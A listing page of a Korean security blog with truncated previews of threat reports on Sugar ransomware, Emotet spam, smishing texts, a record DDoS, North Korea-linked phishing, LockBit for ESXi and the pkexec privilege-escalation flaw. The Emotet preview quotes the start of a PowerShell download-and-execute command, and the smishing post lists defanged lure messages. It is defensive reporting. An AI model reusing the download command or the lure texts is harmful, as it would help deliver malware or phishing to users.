Sugar Ransomware, a new RaaS in the threat landscape 거대 소매업체인 Walmart의 사이버 위협 팀이 새로운 서비스형 랜섬웨어 패밀리인 Sugar를 분석했습니다. 다른 랜섬웨어와는 달리 Sugar는 기업 전체 보다는 주로 개별 컴퓨터에 집중하는 것으로 보입니다. Sugar 악성코드는 2021년 11월 실제 공격에서 처음 발견되었으며, 다른 랜섬웨어 패밀리의 코드를 차용한 Delphi 악성코드입니다. 이 새로운 악성코드 패밀리의 가장 흥미로운 컴포넌트 중 하나는 크립터로 수정된 버전의 RC4 알고리즘을 사용하고 악성코드에서 문자열 디코딩의 일부로 크립터의 동일한 루틴을 재사용합니다. 이는 Sugar 랜섬웨어와 해당 크립터가 동일한 팀에서 개발되었음을 의미합니다. ..

국내외 보안동향 2022. 2. 3. 09:00

안녕하세요? 이스트시큐리티 시큐리티대응센터(이하 ESRC)입니다. 어제부터 이모텟(emotet) 악성코드가 대량으로 유포중에 있어 사용자들의 주의가 필요합니다. 이메일에는 별다른 내용 없이 첨부되어 있는 압축파일의 패스워드만 적혀있습니다. 압축파일 내에는 매크로가 포함된 엑셀 파일이 포함되어 있으며, 문서가 보호되어있다며 사용자로 하여금 '콘텐츠 사용' 버튼의 클릭을 유도합니다. 해당 엑셀파일에는 매크로 악성파일이 포함되어 있으며, 매크로는 특정 사이트에서 html을 hta 형식으로 실행합니다. html은 난독화 되어 있으며, 최종적으로 내부에 포함된 파워쉘 스크립트를 실행합니다 powershell.exe -noexit $c1='(New-Object Net.WebClient).DownloadString(..

악성코드 분석 리포트 2022. 1. 28. 15:26

[1월 네 번째 주] 알약 스미싱 알림 본 포스트는 알약M 사용자 분들이 '신고하기' 기능을 통해 알약으로 신고해 주신 스미싱 내역 중 '특이 문자'를 자체 수집, 집계하여 제공해 드리는 정보성 포스트입니다. 특이 문자 No. 문자내용 1 [대한통운] 고객님 택배 배송 불가 즉시 주소 변경 부탁드립니다.[ xxx.xxxxxxxx[.]com/xxxxxxx ] 2 고객님 택배 배송 실패로 주소가 정확하지 않으니 바로 주소 변경 부탁드립니다.[ hxxps://c11[.]kr/xxxx">hxxps://c11[.]kr/xxxx 3 고객님 택배 배송 실패 주 소 오:류 즉시 주 소 변경 부 탁드립니다., 4 2021년 건강검진{통 지 서} 발송완료.확인하기[xx.xxxx[.]tech] 5 연말 건강검진 통지서가 발..

안전한 PC&모바일 세상/스미싱 알림 2022. 1. 28. 14:53

Microsoft mitigated a 3.47 Tbps DDoS attack, the largest one to date 마이크로소프트가 Azure DDoS 보호 플랫폼에서 초당 3.4억 pps(packets per second)의 속도로 고객을 노린 기록적인 3.47Tbps 공격을 완화했다고 발표했습니다. 해당 공격 소식은 “Azure DDoS Protection —2021 Q3 and Q4 DDoS attack trends” 보고서를 통해 공개되었습니다. “지난 11월, 마이크로소프트는 아시아의 한 Azure 고객을 노린 3.47 Tbps의 처리량과 3.4억 pps를 기록한 DDoS 공격을 완화했습니다. 이는 역대 최대 규모의 공격일 것으로 생각됩니다.” “공격 벡터는 단일 피크로 구성된 SSDP(..

국내외 보안동향 2022. 1. 28. 14:00

안녕하세요? 이스트시큐리티 시큐리티대응센터(이하 ESRC)입니다. 북한 연계 조직이 코로나19 3차 백신접종 전자문서로 위장한 해킹 메일을 유포중에 있어 사용자들의 주의가 필요합니다. 해당 이메일은 주로 특정분야 전문가들을 대상으로 유포되고 있어 분명한 목적을 가진 공격으로 추정됩니다. 이번에 발견된 이메일은 중앙방역대책본부를 위장하고 있으며, 코로나19 백신 3차 접종 후 이상반응 모니터링 현황의 제목으로 사용자의 클릭을 유도합니다. 만일, 사용자가 '확인하기' 버튼을 누르면, 네이버 로그인창을 위장한 피싱 사이트로 넘어갑니다. 피싱 사이트 링크는, 실제 네이버 로그인 페이지 주소인 nid.naver.com을 교묘하게 위장하고 있습니다. 만일 사용자가 해당 페이지를 실제 페이지로 오인하여 계정정보를 입..

악성코드 분석 리포트 2022. 1. 28. 11:14

Experts analyze first LockBit ransomware for Linux and VMware ESXi LockBit 랜섬웨어가 새 버전에 Linux 시스템에 대한 지원을 추가했습니다. 해당 버전은 VMware ESXi 가상 머신을 노렸습니다. 이러한 움직임은 가상화 환경으로 마이그레이션하는 모든 조직을 포함하여 잠재적 타깃을 확대하는 것이 목표인 것으로 보입니다. LockBit은 2021년 10월부터 VMware ESXi 가상 머신을 노리는 새로운 Linux 버전을 광고하고 있었습니다. Trend Micro는 이들이 지난 10월부터 언더그라운드 포럼인 "RAMP"에서 리눅스 버전인 LockBit Linux-ESXi Locker 버전 1.0을 발표하여 광고하고 있었다고 밝혔습니다. Tre..

국내외 보안동향 2022. 1. 28. 09:00

안녕하세요? 이스트시큐리티입니다. 이스트시큐리티를 성원해주시는 모든 분들께 민족 대명절 설날을 맞이하여 감사의 인사를 올립니다. 지난 한 해 동안 보내주신 관심과 성원에 다시 한번 깊이 감사드리며, 2022년 새해에도 이스트시큐리티는 더욱 안전한 세상을 만들어가기 위해 노력하겠습니다. 감사합니다.

이스트시큐리티 소식 2022. 1. 28. 09:00

폴킷(polkit)의 pkexec 유틸리티에 로컬 권한 상승 취약점이 존재합니다. Polkit(이전의 PolicyKit)은 Unix 계열 운영체제에서 시스템 전체 권한을 제어하기 위한 구성요소로, 권한 없는 프로세스가 권한 있는 프로세스와 통신할 수 있는 조직적인 방법을 제공합니다. 취약한 버전의 pkexec는 호출 인수 수를 올바르게 처리하지 못하고 결국 환경 변수를 명령으로 실행하려고 하는데, 공격자는 환경 변수를 조작하여 pkexec가 임의의 코드를 실행하도록 유도함으로써 이를 악용할 수 있습니다. 악용에 성공하면 로컬 권한 상승으로 이어지며 권한이 없는 사용자는 관리자 권한을 얻습니다. 취약한 버전 현재 주로 사용되는 모든 Linux 버전 패치방법 우분투 : https://ubuntu.com/se..

국내외 보안동향 2022. 1. 27. 17:50